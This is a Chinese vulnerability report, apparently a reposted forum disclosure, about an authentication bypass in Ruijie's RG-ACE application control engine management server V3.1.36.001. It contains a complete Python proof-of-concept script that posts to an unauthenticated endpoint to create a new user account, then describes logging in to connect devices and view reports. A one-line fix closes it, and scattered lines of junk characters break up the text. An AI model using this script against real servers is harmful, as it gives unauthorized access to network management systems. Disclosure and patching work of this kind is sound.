锐捷应用控制引擎管理服务器可以增加用户

admin

锐捷应用控制引擎管理服务器（RG-ACE系列应用控制引擎管理服务器V3.1.36.001，官网的连接 http://www.ruijie.com.cn/service/down-search.aspx 显示是最新版）可以根据没有权限验证的接口直接增加用户，连接设备，查看设备信息和报表（权限相对于默认的admin比较低）
) z7 S/ p( s2 ]2 y/ [9 Q, i

测试的具体版本是
0 r" F# Z1 p( A( o( @; G0 y' ?产品名称: 锐捷应用控制引擎
版本号: 3.1.36.001 TC
& o% }* Q* J* Q6 ]) X编译时间: 201104291730


' ^: i8 |& X; O" {; ^漏洞证明：


" h& G) C( O# n0 v: d# Q
8 V& R! u# `7 w- }& ~3 h


执行脚本
% K' b$ r. F2 ?% j6 P. t#! /usr/bin/env python
* P4 u9 o5 Q: ^4 D( U#coding=gbk
#RG-ACE管理服务器 V3.1.36.001
import urllib2, urllib,cookielib
url=r'http://IP/mars/doInsertUserInfo.do' #IP改为装这个软件的IP
opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cookielib.CookieJar()))
. @# Z! [, J  v: \opener.addheaders = [('User-agent','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)')]
post=(("event","userManager.doInsertUserInfo"),
& \1 _' E) m+ `) A+ v("useractionname","addButtonValue"),
("useropermanager","userManager"),
/ t" H! a; M7 b("userName","t"), #######账号自己加
("pwd","aaaaaa"),######密码自己加
("trueName","ad"),
("email",""),
6 x1 T' g2 B3 Q! X9 l: k("mobilePhone",""),
("officePhone",""),
& w+ Y+ h8 G  d0 F, [& M("addr",""),
("submit","确定"))
6 F) Q& x7 D+ v/ Burllib2.install_opener(opener)
p=urllib2.urlopen(url, urllib.urlencode(post)).read()
print "Done"

( N! @* r9 ^! C- n1 ]0 z登录，连接设备
7 P7 B" w/ Q7 z
4 F7 Q  y8 c1 I$ t! z$ W# ^! ~$ x
) L$ e; i8 V7 k7 d$ X1 t
8 A& C8 z5 W" Q6 t) M. g) Z- k  i
# a- J: ~! v* s! H9 Z( N1 }# y
默认的管理员admin权限更大点
; [, Q0 o3 V8 C+ }7 j, u: q, e2 `
$ E4 e2 o- ~! F, S6 ^) d
* H* Y* O" i( z1 V$ {% [
; A0 q4 t' t; w" a9 C: @* p! I/ O
2 V* C" s0 `' Y& h
修复方案：
加强对接口的权限验证

/ C& `, d$ z  e( G; \7 U